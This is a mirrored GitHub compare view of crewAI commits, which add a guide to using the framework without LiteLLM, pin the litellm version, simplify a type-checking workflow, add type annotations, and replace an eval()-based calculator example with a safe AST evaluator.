mirror of
https://github.com/crewAIInc/crewAI.git
synced 2026-04-27 21:32:36 +00:00
Compare commits
9 Commits
feature/re
...
devin/1774
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
ed0da4a831 | ||
|
|
8a1424534e | ||
|
|
b53c08812d | ||
|
|
ec8d444cfc | ||
|
|
8d1edd5d65 | ||
|
|
7f5ffce057 | ||
|
|
724ab5c5e1 | ||
|
|
82a7c364c5 | ||
|
|
36702229d7 |
35
.github/workflows/type-checker.yml
vendored
35
.github/workflows/type-checker.yml
vendored
@@ -17,8 +17,6 @@ jobs:
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
with:
|
||||
fetch-depth: 0 # Fetch all history for proper diff
|
||||
|
||||
- name: Restore global uv cache
|
||||
id: cache-restore
|
||||
@@ -42,37 +40,8 @@ jobs:
|
||||
- name: Install dependencies
|
||||
run: uv sync --all-groups --all-extras
|
||||
|
||||
- name: Get changed Python files
|
||||
id: changed-files
|
||||
run: |
|
||||
# Get the list of changed Python files compared to the base branch
|
||||
echo "Fetching changed files..."
|
||||
git diff --name-only --diff-filter=ACMRT origin/${{ github.base_ref }}...HEAD -- '*.py' > changed_files.txt
|
||||
|
||||
# Filter for files in src/ directory only (excluding tests/)
|
||||
grep -E "^src/" changed_files.txt > filtered_changed_files.txt || true
|
||||
|
||||
# Check if there are any changed files
|
||||
if [ -s filtered_changed_files.txt ]; then
|
||||
echo "Changed Python files in src/:"
|
||||
cat filtered_changed_files.txt
|
||||
echo "has_changes=true" >> $GITHUB_OUTPUT
|
||||
# Convert newlines to spaces for mypy command
|
||||
echo "files=$(cat filtered_changed_files.txt | tr '\n' ' ')" >> $GITHUB_OUTPUT
|
||||
else
|
||||
echo "No Python files changed in src/"
|
||||
echo "has_changes=false" >> $GITHUB_OUTPUT
|
||||
fi
|
||||
|
||||
- name: Run type checks on changed files
|
||||
if: steps.changed-files.outputs.has_changes == 'true'
|
||||
run: |
|
||||
echo "Running mypy on changed files with Python ${{ matrix.python-version }}..."
|
||||
uv run mypy ${{ steps.changed-files.outputs.files }}
|
||||
|
||||
- name: No files to check
|
||||
if: steps.changed-files.outputs.has_changes == 'false'
|
||||
run: echo "No Python files in src/ were modified - skipping type checks"
|
||||
- name: Run type checks
|
||||
run: uv run mypy lib/crewai/src/crewai/
|
||||
|
||||
- name: Save uv caches
|
||||
if: steps.cache-restore.outputs.cache-hit != 'true'
|
||||
|
||||
@@ -353,6 +353,7 @@
|
||||
"en/learn/kickoff-async",
|
||||
"en/learn/kickoff-for-each",
|
||||
"en/learn/llm-connections",
|
||||
"en/learn/litellm-removal-guide",
|
||||
"en/learn/multimodal-agents",
|
||||
"en/learn/replay-tasks-from-latest-crew-kickoff",
|
||||
"en/learn/sequential-process",
|
||||
@@ -820,6 +821,7 @@
|
||||
"en/learn/kickoff-async",
|
||||
"en/learn/kickoff-for-each",
|
||||
"en/learn/llm-connections",
|
||||
"en/learn/litellm-removal-guide",
|
||||
"en/learn/multimodal-agents",
|
||||
"en/learn/replay-tasks-from-latest-crew-kickoff",
|
||||
"en/learn/sequential-process",
|
||||
@@ -1287,6 +1289,7 @@
|
||||
"en/learn/kickoff-async",
|
||||
"en/learn/kickoff-for-each",
|
||||
"en/learn/llm-connections",
|
||||
"en/learn/litellm-removal-guide",
|
||||
"en/learn/multimodal-agents",
|
||||
"en/learn/replay-tasks-from-latest-crew-kickoff",
|
||||
"en/learn/sequential-process",
|
||||
@@ -1755,6 +1758,7 @@
|
||||
"en/learn/kickoff-async",
|
||||
"en/learn/kickoff-for-each",
|
||||
"en/learn/llm-connections",
|
||||
"en/learn/litellm-removal-guide",
|
||||
"en/learn/multimodal-agents",
|
||||
"en/learn/replay-tasks-from-latest-crew-kickoff",
|
||||
"en/learn/sequential-process",
|
||||
|
||||
358
docs/en/learn/litellm-removal-guide.mdx
Normal file
358
docs/en/learn/litellm-removal-guide.mdx
Normal file
@@ -0,0 +1,358 @@
|
||||
---
|
||||
title: Using CrewAI Without LiteLLM
|
||||
description: How to use CrewAI with native provider integrations and remove the LiteLLM dependency from your project.
|
||||
icon: shield-check
|
||||
mode: "wide"
|
||||
---
|
||||
|
||||
## Overview
|
||||
|
||||
CrewAI supports two paths for connecting to LLM providers:
|
||||
|
||||
1. **Native integrations** — direct SDK connections to OpenAI, Anthropic, Google Gemini, Azure OpenAI, and AWS Bedrock
|
||||
2. **LiteLLM fallback** — a translation layer that supports 100+ additional providers
|
||||
|
||||
This guide explains how to use CrewAI exclusively with native provider integrations, removing any dependency on LiteLLM.
|
||||
|
||||
<Warning>
|
||||
The `litellm` package was quarantined on PyPI due to a security/reliability incident. If you rely on LiteLLM-dependent providers, you should migrate to native integrations. CrewAI's native integrations give you full functionality without LiteLLM.
|
||||
</Warning>
|
||||
|
||||
## Why Remove LiteLLM?
|
||||
|
||||
- **Reduced dependency surface** — fewer packages means fewer potential supply-chain risks
|
||||
- **Better performance** — native SDKs communicate directly with provider APIs, eliminating a translation layer
|
||||
- **Simpler debugging** — one less abstraction layer between your code and the provider
|
||||
- **Smaller install footprint** — LiteLLM brings in many transitive dependencies
|
||||
|
||||
## Native Providers (No LiteLLM Required)
|
||||
|
||||
These providers use their own SDKs and work without LiteLLM installed:
|
||||
|
||||
<CardGroup cols={2}>
|
||||
<Card title="OpenAI" icon="bolt">
|
||||
GPT-4o, GPT-4o-mini, o1, o3-mini, and more.
|
||||
```bash
|
||||
uv add "crewai[openai]"
|
||||
```
|
||||
</Card>
|
||||
<Card title="Anthropic" icon="a">
|
||||
Claude Sonnet, Claude Haiku, and more.
|
||||
```bash
|
||||
uv add "crewai[anthropic]"
|
||||
```
|
||||
</Card>
|
||||
<Card title="Google Gemini" icon="google">
|
||||
Gemini 2.0 Flash, Gemini 2.0 Pro, and more.
|
||||
```bash
|
||||
uv add "crewai[gemini]"
|
||||
```
|
||||
</Card>
|
||||
<Card title="Azure OpenAI" icon="microsoft">
|
||||
Azure-hosted OpenAI models.
|
||||
```bash
|
||||
uv add "crewai[azure]"
|
||||
```
|
||||
</Card>
|
||||
<Card title="AWS Bedrock" icon="aws">
|
||||
Claude, Llama, Titan, and more via AWS.
|
||||
```bash
|
||||
uv add "crewai[bedrock]"
|
||||
```
|
||||
</Card>
|
||||
</CardGroup>
|
||||
|
||||
<Info>
|
||||
If you only use native providers, you **never** need to install `crewai[litellm]`. The base `crewai` package plus your chosen provider extra is all you need.
|
||||
</Info>
|
||||
|
||||
## How to Check If You're Using LiteLLM
|
||||
|
||||
### Check your model strings
|
||||
|
||||
If your code uses model prefixes like these, you're routing through LiteLLM:
|
||||
|
||||
| Prefix | Provider | Uses LiteLLM? |
|
||||
|--------|----------|---------------|
|
||||
| `ollama/` | Ollama | ✅ Yes |
|
||||
| `groq/` | Groq | ✅ Yes |
|
||||
| `together_ai/` | Together AI | ✅ Yes |
|
||||
| `mistral/` | Mistral | ✅ Yes |
|
||||
| `cohere/` | Cohere | ✅ Yes |
|
||||
| `huggingface/` | Hugging Face | ✅ Yes |
|
||||
| `openai/` | OpenAI | ❌ Native |
|
||||
| `anthropic/` | Anthropic | ❌ Native |
|
||||
| `gemini/` | Google Gemini | ❌ Native |
|
||||
| `azure/` | Azure OpenAI | ❌ Native |
|
||||
| `bedrock/` | AWS Bedrock | ❌ Native |
|
||||
|
||||
### Check if LiteLLM is installed
|
||||
|
||||
```bash
|
||||
# Using pip
|
||||
pip show litellm
|
||||
|
||||
# Using uv
|
||||
uv pip show litellm
|
||||
```
|
||||
|
||||
If the command returns package information, LiteLLM is installed in your environment.
|
||||
|
||||
### Check your dependencies
|
||||
|
||||
Look at your `pyproject.toml` for `crewai[litellm]`:
|
||||
|
||||
```toml
|
||||
# If you see this, you have LiteLLM as a dependency
|
||||
dependencies = [
|
||||
"crewai[litellm]>=0.100.0", # ← Uses LiteLLM
|
||||
]
|
||||
|
||||
# Change to a native provider extra instead
|
||||
dependencies = [
|
||||
"crewai[openai]>=0.100.0", # ← Native, no LiteLLM
|
||||
]
|
||||
```
|
||||
|
||||
## Migration Guide
|
||||
|
||||
### Step 1: Identify your current provider
|
||||
|
||||
Find all `LLM()` calls and model strings in your code:
|
||||
|
||||
```bash
|
||||
# Search your codebase for LLM model strings
|
||||
grep -r "LLM(" --include="*.py" .
|
||||
grep -r "llm=" --include="*.yaml" .
|
||||
grep -r "llm:" --include="*.yaml" .
|
||||
```
|
||||
|
||||
### Step 2: Switch to a native provider
|
||||
|
||||
<Tabs>
|
||||
<Tab title="Switch to OpenAI">
|
||||
```python
|
||||
from crewai import LLM
|
||||
|
||||
# Before (LiteLLM):
|
||||
# llm = LLM(model="groq/llama-3.1-70b")
|
||||
|
||||
# After (Native):
|
||||
llm = LLM(model="openai/gpt-4o")
|
||||
```
|
||||
|
||||
```bash
|
||||
# Install
|
||||
uv add "crewai[openai]"
|
||||
|
||||
# Set your API key
|
||||
export OPENAI_API_KEY="sk-..."
|
||||
```
|
||||
</Tab>
|
||||
<Tab title="Switch to Anthropic">
|
||||
```python
|
||||
from crewai import LLM
|
||||
|
||||
# Before (LiteLLM):
|
||||
# llm = LLM(model="together_ai/meta-llama/Meta-Llama-3.1-70B")
|
||||
|
||||
# After (Native):
|
||||
llm = LLM(model="anthropic/claude-sonnet-4-20250514")
|
||||
```
|
||||
|
||||
```bash
|
||||
# Install
|
||||
uv add "crewai[anthropic]"
|
||||
|
||||
# Set your API key
|
||||
export ANTHROPIC_API_KEY="sk-ant-..."
|
||||
```
|
||||
</Tab>
|
||||
<Tab title="Switch to Gemini">
|
||||
```python
|
||||
from crewai import LLM
|
||||
|
||||
# Before (LiteLLM):
|
||||
# llm = LLM(model="mistral/mistral-large-latest")
|
||||
|
||||
# After (Native):
|
||||
llm = LLM(model="gemini/gemini-2.0-flash")
|
||||
```
|
||||
|
||||
```bash
|
||||
# Install
|
||||
uv add "crewai[gemini]"
|
||||
|
||||
# Set your API key
|
||||
export GEMINI_API_KEY="..."
|
||||
```
|
||||
</Tab>
|
||||
<Tab title="Switch to Azure OpenAI">
|
||||
```python
|
||||
from crewai import LLM
|
||||
|
||||
# After (Native):
|
||||
llm = LLM(
|
||||
model="azure/your-deployment-name",
|
||||
api_key="your-azure-api-key",
|
||||
base_url="https://your-resource.openai.azure.com",
|
||||
api_version="2024-06-01"
|
||||
)
|
||||
```
|
||||
|
||||
```bash
|
||||
# Install
|
||||
uv add "crewai[azure]"
|
||||
```
|
||||
</Tab>
|
||||
<Tab title="Switch to AWS Bedrock">
|
||||
```python
|
||||
from crewai import LLM
|
||||
|
||||
# After (Native):
|
||||
llm = LLM(
|
||||
model="bedrock/anthropic.claude-3-5-sonnet-20241022-v2:0",
|
||||
aws_region_name="us-east-1"
|
||||
)
|
||||
```
|
||||
|
||||
```bash
|
||||
# Install
|
||||
uv add "crewai[bedrock]"
|
||||
|
||||
# Configure AWS credentials
|
||||
export AWS_ACCESS_KEY_ID="..."
|
||||
export AWS_SECRET_ACCESS_KEY="..."
|
||||
export AWS_DEFAULT_REGION="us-east-1"
|
||||
```
|
||||
</Tab>
|
||||
</Tabs>
|
||||
|
||||
### Step 3: Keep Ollama without LiteLLM
|
||||
|
||||
If you're using Ollama and want to keep using it, you can connect via Ollama's OpenAI-compatible API:
|
||||
|
||||
```python
|
||||
from crewai import LLM
|
||||
|
||||
# Before (LiteLLM):
|
||||
# llm = LLM(model="ollama/llama3")
|
||||
|
||||
# After (OpenAI-compatible mode, no LiteLLM needed):
|
||||
llm = LLM(
|
||||
model="openai/llama3",
|
||||
base_url="http://localhost:11434/v1",
|
||||
api_key="ollama" # Ollama doesn't require a real API key
|
||||
)
|
||||
```
|
||||
|
||||
<Tip>
|
||||
Many local inference servers (Ollama, vLLM, LM Studio, llama.cpp) expose an OpenAI-compatible API. You can use the `openai/` prefix with a custom `base_url` to connect to any of them natively.
|
||||
</Tip>
|
||||
|
||||
### Step 4: Update your YAML configs
|
||||
|
||||
```yaml
|
||||
# Before (LiteLLM providers):
|
||||
researcher:
|
||||
role: Research Specialist
|
||||
goal: Conduct research
|
||||
backstory: A dedicated researcher
|
||||
llm: groq/llama-3.1-70b # ← LiteLLM
|
||||
|
||||
# After (Native provider):
|
||||
researcher:
|
||||
role: Research Specialist
|
||||
goal: Conduct research
|
||||
backstory: A dedicated researcher
|
||||
llm: openai/gpt-4o # ← Native
|
||||
```
|
||||
|
||||
### Step 5: Remove LiteLLM
|
||||
|
||||
Once you've migrated all your model references:
|
||||
|
||||
```bash
|
||||
# Remove litellm from your project
|
||||
uv remove litellm
|
||||
|
||||
# Or if using pip
|
||||
pip uninstall litellm
|
||||
|
||||
# Update your pyproject.toml: change crewai[litellm] to your provider extra
|
||||
# e.g., crewai[openai], crewai[anthropic], crewai[gemini]
|
||||
```
|
||||
|
||||
### Step 6: Verify
|
||||
|
||||
Run your project and confirm everything works:
|
||||
|
||||
```bash
|
||||
# Run your crew
|
||||
crewai run
|
||||
|
||||
# Or run your tests
|
||||
uv run pytest
|
||||
```
|
||||
|
||||
## Quick Reference: Model String Mapping
|
||||
|
||||
Here are common migration paths from LiteLLM-dependent providers to native ones:
|
||||
|
||||
```python
|
||||
from crewai import LLM
|
||||
|
||||
# ─── LiteLLM providers → Native alternatives ────────────────────
|
||||
|
||||
# Groq → OpenAI or Anthropic
|
||||
# llm = LLM(model="groq/llama-3.1-70b")
|
||||
llm = LLM(model="openai/gpt-4o-mini") # Fast & affordable
|
||||
llm = LLM(model="anthropic/claude-haiku-3-5") # Fast & affordable
|
||||
|
||||
# Together AI → OpenAI or Gemini
|
||||
# llm = LLM(model="together_ai/meta-llama/Meta-Llama-3.1-70B")
|
||||
llm = LLM(model="openai/gpt-4o") # High quality
|
||||
llm = LLM(model="gemini/gemini-2.0-flash") # Fast & capable
|
||||
|
||||
# Mistral → Anthropic or OpenAI
|
||||
# llm = LLM(model="mistral/mistral-large-latest")
|
||||
llm = LLM(model="anthropic/claude-sonnet-4-20250514") # High quality
|
||||
|
||||
# Ollama → OpenAI-compatible (keep using local models)
|
||||
# llm = LLM(model="ollama/llama3")
|
||||
llm = LLM(
|
||||
model="openai/llama3",
|
||||
base_url="http://localhost:11434/v1",
|
||||
api_key="ollama"
|
||||
)
|
||||
```
|
||||
|
||||
## FAQ
|
||||
|
||||
<AccordionGroup>
|
||||
<Accordion title="Do I lose any functionality by removing LiteLLM?">
|
||||
No, if you use one of the five natively supported providers (OpenAI, Anthropic, Gemini, Azure, Bedrock). These native integrations support all CrewAI features including streaming, tool calling, structured output, and more. You only lose access to providers that are exclusively available through LiteLLM (like Groq, Together AI, Mistral as first-class providers).
|
||||
</Accordion>
|
||||
<Accordion title="Can I use multiple native providers at the same time?">
|
||||
Yes. Install multiple extras and use different providers for different agents:
|
||||
```bash
|
||||
uv add "crewai[openai,anthropic,gemini]"
|
||||
```
|
||||
```python
|
||||
researcher = Agent(llm="openai/gpt-4o", ...)
|
||||
writer = Agent(llm="anthropic/claude-sonnet-4-20250514", ...)
|
||||
```
|
||||
</Accordion>
|
||||
<Accordion title="Is LiteLLM safe to use now?">
|
||||
Regardless of quarantine status, reducing your dependency surface is good security practice. If you only need providers that CrewAI supports natively, there's no reason to keep LiteLLM installed.
|
||||
</Accordion>
|
||||
<Accordion title="What about environment variables like OPENAI_API_KEY?">
|
||||
Native providers use the same environment variables you're already familiar with. No changes needed for `OPENAI_API_KEY`, `ANTHROPIC_API_KEY`, `GEMINI_API_KEY`, etc.
|
||||
</Accordion>
|
||||
</AccordionGroup>
|
||||
|
||||
## Related Resources
|
||||
|
||||
- [LLM Connections](/en/learn/llm-connections) — Full guide to connecting CrewAI with any LLM
|
||||
- [LLM Concepts](/en/concepts/llms) — Understanding LLMs in CrewAI
|
||||
- [LLM Selection Guide](/en/learn/llm-selection-guide) — Choosing the right model for your use case
|
||||
@@ -83,7 +83,7 @@ voyageai = [
|
||||
"voyageai~=0.3.5",
|
||||
]
|
||||
litellm = [
|
||||
"litellm>=1.74.9,<3",
|
||||
"litellm>=1.74.9,<=1.82.6",
|
||||
]
|
||||
bedrock = [
|
||||
"boto3~=1.40.45",
|
||||
|
||||
@@ -5,9 +5,12 @@ from __future__ import annotations
|
||||
from abc import ABC, abstractmethod
|
||||
import json
|
||||
import re
|
||||
from typing import TYPE_CHECKING, Any, Final, Literal
|
||||
from typing import TYPE_CHECKING, Final, Literal
|
||||
|
||||
from crewai.utilities.pydantic_schema_utils import generate_model_description
|
||||
from crewai.utilities.pydantic_schema_utils import (
|
||||
ModelDescription,
|
||||
generate_model_description,
|
||||
)
|
||||
|
||||
|
||||
if TYPE_CHECKING:
|
||||
@@ -41,7 +44,7 @@ class BaseConverterAdapter(ABC):
|
||||
"""
|
||||
self.agent_adapter = agent_adapter
|
||||
self._output_format: Literal["json", "pydantic"] | None = None
|
||||
self._schema: dict[str, Any] | None = None
|
||||
self._schema: ModelDescription | None = None
|
||||
|
||||
@abstractmethod
|
||||
def configure_structured_output(self, task: Task) -> None:
|
||||
@@ -128,7 +131,7 @@ class BaseConverterAdapter(ABC):
|
||||
@staticmethod
|
||||
def _configure_format_from_task(
|
||||
task: Task,
|
||||
) -> tuple[Literal["json", "pydantic"] | None, dict[str, Any] | None]:
|
||||
) -> tuple[Literal["json", "pydantic"] | None, ModelDescription | None]:
|
||||
"""Determine output format and schema from task requirements.
|
||||
|
||||
This is a helper method that examines the task's output requirements
|
||||
|
||||
@@ -64,7 +64,7 @@ class LangGraphAgentAdapter(BaseAgentAdapter):
|
||||
llm: Any = None,
|
||||
max_iterations: int = 10,
|
||||
agent_config: dict[str, Any] | None = None,
|
||||
**kwargs,
|
||||
**kwargs: Any,
|
||||
) -> None:
|
||||
"""Initialize the LangGraph agent adapter.
|
||||
|
||||
|
||||
@@ -948,7 +948,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
|
||||
)
|
||||
error_event_emitted = False
|
||||
|
||||
track_delegation_if_needed(func_name, args_dict, self.task)
|
||||
track_delegation_if_needed(func_name, args_dict or {}, self.task)
|
||||
|
||||
structured_tool: CrewStructuredTool | None = None
|
||||
if original_tool is not None:
|
||||
@@ -965,7 +965,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
|
||||
hook_blocked = False
|
||||
before_hook_context = ToolCallHookContext(
|
||||
tool_name=func_name,
|
||||
tool_input=args_dict,
|
||||
tool_input=args_dict or {},
|
||||
tool=structured_tool, # type: ignore[arg-type]
|
||||
agent=self.agent,
|
||||
task=self.task,
|
||||
@@ -991,7 +991,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
|
||||
result = f"Tool '{func_name}' has reached its usage limit of {original_tool.max_usage_count} times and cannot be used anymore."
|
||||
elif not from_cache and func_name in available_functions:
|
||||
try:
|
||||
raw_result = available_functions[func_name](**args_dict)
|
||||
raw_result = available_functions[func_name](**(args_dict or {}))
|
||||
|
||||
if self.tools_handler and self.tools_handler.cache:
|
||||
should_cache = True
|
||||
@@ -1001,7 +1001,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
|
||||
and callable(original_tool.cache_function)
|
||||
):
|
||||
should_cache = original_tool.cache_function(
|
||||
args_dict, raw_result
|
||||
args_dict or {}, raw_result
|
||||
)
|
||||
if should_cache:
|
||||
self.tools_handler.cache.add(
|
||||
@@ -1030,7 +1030,7 @@ class CrewAgentExecutor(CrewAgentExecutorMixin):
|
||||
|
||||
after_hook_context = ToolCallHookContext(
|
||||
tool_name=func_name,
|
||||
tool_input=args_dict,
|
||||
tool_input=args_dict or {},
|
||||
tool=structured_tool, # type: ignore[arg-type]
|
||||
agent=self.agent,
|
||||
task=self.task,
|
||||
|
||||
@@ -77,7 +77,7 @@ CLI_SETTINGS_KEYS = [
|
||||
]
|
||||
|
||||
# Default values for CLI settings
|
||||
DEFAULT_CLI_SETTINGS = {
|
||||
DEFAULT_CLI_SETTINGS: dict[str, Any] = {
|
||||
"enterprise_base_url": DEFAULT_CREWAI_ENTERPRISE_URL,
|
||||
"oauth2_provider": CREWAI_ENTERPRISE_DEFAULT_OAUTH2_PROVIDER,
|
||||
"oauth2_audience": CREWAI_ENTERPRISE_DEFAULT_OAUTH2_AUDIENCE,
|
||||
|
||||
@@ -173,13 +173,13 @@ class MemoryTUI(App[None]):
|
||||
info = self._memory.info("/")
|
||||
tree.root.label = f"/ ({info.record_count} records)"
|
||||
tree.root.data = "/"
|
||||
self._add_children(tree.root, "/", depth=0, max_depth=3)
|
||||
self._add_scope_children(tree.root, "/", depth=0, max_depth=3)
|
||||
tree.root.expand()
|
||||
return tree
|
||||
|
||||
def _add_children(
|
||||
def _add_scope_children(
|
||||
self,
|
||||
parent_node: Tree.Node[str],
|
||||
parent_node: Any,
|
||||
path: str,
|
||||
depth: int,
|
||||
max_depth: int,
|
||||
@@ -191,7 +191,7 @@ class MemoryTUI(App[None]):
|
||||
child_info = self._memory.info(child)
|
||||
label = f"{child} ({child_info.record_count})"
|
||||
node = parent_node.add(label, data=child)
|
||||
self._add_children(node, child, depth + 1, max_depth)
|
||||
self._add_scope_children(node, child, depth + 1, max_depth)
|
||||
|
||||
# -- Populating the OptionList -------------------------------------------
|
||||
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
import subprocess
|
||||
from typing import Any
|
||||
|
||||
import click
|
||||
|
||||
@@ -6,7 +7,7 @@ from crewai.cli.utils import get_crews, get_flows
|
||||
from crewai.flow import Flow
|
||||
|
||||
|
||||
def _reset_flow_memory(flow: Flow) -> None:
|
||||
def _reset_flow_memory(flow: Flow[Any]) -> None:
|
||||
"""Reset memory for a single flow instance.
|
||||
|
||||
Handles Memory, MemoryScope (both have .reset()), and MemorySlice
|
||||
|
||||
@@ -765,12 +765,39 @@ class CustomSearchTool(BaseTool):
|
||||
|
||||
### Using @tool Decorator
|
||||
```python
|
||||
import ast
|
||||
import operator
|
||||
|
||||
from crewai.tools import tool
|
||||
|
||||
@tool("Calculator")
|
||||
def calculator(expression: str) -> str:
|
||||
"""Evaluates a mathematical expression and returns the result."""
|
||||
return str(eval(expression))
|
||||
"""Evaluates a mathematical expression and returns the result.
|
||||
|
||||
Supports +, -, *, /, ** and parentheses on numeric values.
|
||||
"""
|
||||
ops = {
|
||||
ast.Add: operator.add,
|
||||
ast.Sub: operator.sub,
|
||||
ast.Mult: operator.mul,
|
||||
ast.Div: operator.truediv,
|
||||
ast.Pow: operator.pow,
|
||||
ast.USub: operator.neg,
|
||||
}
|
||||
|
||||
def _safe_eval(node):
|
||||
if isinstance(node, ast.Expression):
|
||||
return _safe_eval(node.body)
|
||||
elif isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
|
||||
return node.value
|
||||
elif isinstance(node, ast.BinOp) and type(node.op) in ops:
|
||||
return ops[type(node.op)](_safe_eval(node.left), _safe_eval(node.right))
|
||||
elif isinstance(node, ast.UnaryOp) and type(node.op) in ops:
|
||||
return ops[type(node.op)](_safe_eval(node.operand))
|
||||
raise ValueError(f"Unsupported expression: {ast.dump(node)}")
|
||||
|
||||
tree = ast.parse(expression, mode="eval")
|
||||
return str(_safe_eval(tree))
|
||||
```
|
||||
|
||||
### Built-in Tools (install with `uv add crewai-tools`)
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
import os
|
||||
import shutil
|
||||
from typing import Any
|
||||
|
||||
import tomli_w
|
||||
|
||||
@@ -11,7 +12,7 @@ def update_crew() -> None:
|
||||
migrate_pyproject("pyproject.toml", "pyproject.toml")
|
||||
|
||||
|
||||
def migrate_pyproject(input_file, output_file):
|
||||
def migrate_pyproject(input_file: str, output_file: str) -> None:
|
||||
"""
|
||||
Migrate the pyproject.toml to the new format.
|
||||
|
||||
@@ -23,8 +24,7 @@ def migrate_pyproject(input_file, output_file):
|
||||
# Read the input pyproject.toml
|
||||
pyproject_data = read_toml()
|
||||
|
||||
# Initialize the new project structure
|
||||
new_pyproject = {
|
||||
new_pyproject: dict[str, Any] = {
|
||||
"project": {},
|
||||
"build-system": {"requires": ["hatchling"], "build-backend": "hatchling.build"},
|
||||
}
|
||||
|
||||
@@ -386,7 +386,7 @@ def fetch_crews(module_attr: Any) -> list[Crew]:
|
||||
return crew_instances
|
||||
|
||||
|
||||
def get_flow_instance(module_attr: Any) -> Flow | None:
|
||||
def get_flow_instance(module_attr: Any) -> Flow[Any] | None:
|
||||
"""Check if a module attribute is a user-defined Flow subclass and return an instance.
|
||||
|
||||
Args:
|
||||
@@ -413,7 +413,7 @@ _SKIP_DIRS = frozenset(
|
||||
)
|
||||
|
||||
|
||||
def get_flows(flow_path: str = "main.py") -> list[Flow]:
|
||||
def get_flows(flow_path: str = "main.py") -> list[Flow[Any]]:
|
||||
"""Get the flow instances from project files.
|
||||
|
||||
Walks the project directory looking for files matching ``flow_path``
|
||||
@@ -427,7 +427,7 @@ def get_flows(flow_path: str = "main.py") -> list[Flow]:
|
||||
Returns:
|
||||
A list of discovered Flow instances.
|
||||
"""
|
||||
flow_instances: list[Flow] = []
|
||||
flow_instances: list[Flow[Any]] = []
|
||||
try:
|
||||
current_dir = os.getcwd()
|
||||
if current_dir not in sys.path:
|
||||
|
||||
@@ -45,14 +45,14 @@ class CrewOutput(BaseModel):
|
||||
output_dict.update(self.pydantic.model_dump())
|
||||
return output_dict
|
||||
|
||||
def __getitem__(self, key):
|
||||
def __getitem__(self, key: str) -> Any:
|
||||
if self.pydantic and hasattr(self.pydantic, key):
|
||||
return getattr(self.pydantic, key)
|
||||
if self.json_dict and key in self.json_dict:
|
||||
return self.json_dict[key]
|
||||
raise KeyError(f"Key '{key}' not found in CrewOutput.")
|
||||
|
||||
def __str__(self):
|
||||
def __str__(self) -> str:
|
||||
if self.pydantic:
|
||||
return str(self.pydantic)
|
||||
if self.json_dict:
|
||||
|
||||
@@ -6,6 +6,7 @@ handlers execute in correct order while maximizing parallelism.
|
||||
|
||||
from collections import defaultdict, deque
|
||||
from collections.abc import Sequence
|
||||
from typing import Any
|
||||
|
||||
from crewai.events.depends import Depends
|
||||
from crewai.events.types.event_bus_types import ExecutionPlan, Handler
|
||||
@@ -45,7 +46,7 @@ class HandlerGraph:
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
handlers: dict[Handler, list[Depends]],
|
||||
handlers: dict[Handler, list[Depends[Any]]],
|
||||
) -> None:
|
||||
"""Initialize the dependency graph.
|
||||
|
||||
@@ -103,7 +104,7 @@ class HandlerGraph:
|
||||
|
||||
def build_execution_plan(
|
||||
handlers: Sequence[Handler],
|
||||
dependencies: dict[Handler, list[Depends]],
|
||||
dependencies: dict[Handler, list[Depends[Any]]],
|
||||
) -> ExecutionPlan:
|
||||
"""Build an execution plan from handlers and their dependencies.
|
||||
|
||||
@@ -118,7 +119,7 @@ def build_execution_plan(
|
||||
Raises:
|
||||
CircularDependencyError: If circular dependencies are detected
|
||||
"""
|
||||
handler_dict: dict[Handler, list[Depends]] = {
|
||||
handler_dict: dict[Handler, list[Depends[Any]]] = {
|
||||
h: dependencies.get(h, []) for h in handlers
|
||||
}
|
||||
|
||||
|
||||
@@ -65,9 +65,9 @@ class FirstTimeTraceHandler:
|
||||
self._gracefully_fail(f"Error in trace handling: {e}")
|
||||
mark_first_execution_completed(user_consented=False)
|
||||
|
||||
def _initialize_backend_and_send_events(self):
|
||||
def _initialize_backend_and_send_events(self) -> None:
|
||||
"""Initialize backend batch and send collected events."""
|
||||
if not self.batch_manager:
|
||||
if not self.batch_manager or not self.batch_manager.trace_batch_id:
|
||||
return
|
||||
|
||||
try:
|
||||
@@ -115,12 +115,13 @@ class FirstTimeTraceHandler:
|
||||
except Exception as e:
|
||||
self._gracefully_fail(f"Backend initialization failed: {e}")
|
||||
|
||||
def _display_ephemeral_trace_link(self):
|
||||
def _display_ephemeral_trace_link(self) -> None:
|
||||
"""Display the ephemeral trace link to the user and automatically open browser."""
|
||||
console = Console()
|
||||
|
||||
try:
|
||||
webbrowser.open(self.ephemeral_url)
|
||||
if self.ephemeral_url:
|
||||
webbrowser.open(self.ephemeral_url)
|
||||
except Exception: # noqa: S110
|
||||
pass
|
||||
|
||||
@@ -158,7 +159,7 @@ To disable tracing later, do any one of these:
|
||||
console.print(panel)
|
||||
console.print()
|
||||
|
||||
def _show_tracing_declined_message(self):
|
||||
def _show_tracing_declined_message(self) -> None:
|
||||
"""Show message when user declines tracing."""
|
||||
console = Console()
|
||||
|
||||
@@ -184,15 +185,18 @@ To enable tracing later, do any one of these:
|
||||
console.print(panel)
|
||||
console.print()
|
||||
|
||||
def _gracefully_fail(self, error_message: str):
|
||||
def _gracefully_fail(self, error_message: str) -> None:
|
||||
"""Handle errors gracefully without disrupting user experience."""
|
||||
console = Console()
|
||||
console.print(f"[yellow]Note: {error_message}[/yellow]")
|
||||
|
||||
logger.debug(f"First-time trace error: {error_message}")
|
||||
|
||||
def _show_local_trace_message(self):
|
||||
def _show_local_trace_message(self) -> None:
|
||||
"""Show message when traces were collected locally but couldn't be uploaded."""
|
||||
if self.batch_manager is None:
|
||||
return
|
||||
|
||||
console = Console()
|
||||
|
||||
panel_content = f"""
|
||||
|
||||
@@ -6,6 +6,7 @@ from collections.abc import Sequence
|
||||
from typing import Any
|
||||
|
||||
from pydantic import ConfigDict, model_validator
|
||||
from typing_extensions import Self
|
||||
|
||||
from crewai.agents.agent_builder.base_agent import BaseAgent
|
||||
from crewai.events.base_events import BaseEvent
|
||||
@@ -25,16 +26,9 @@ class AgentExecutionStartedEvent(BaseEvent):
|
||||
model_config = ConfigDict(arbitrary_types_allowed=True)
|
||||
|
||||
@model_validator(mode="after")
|
||||
def set_fingerprint_data(self):
|
||||
def set_fingerprint_data(self) -> Self:
|
||||
"""Set fingerprint data from the agent if available."""
|
||||
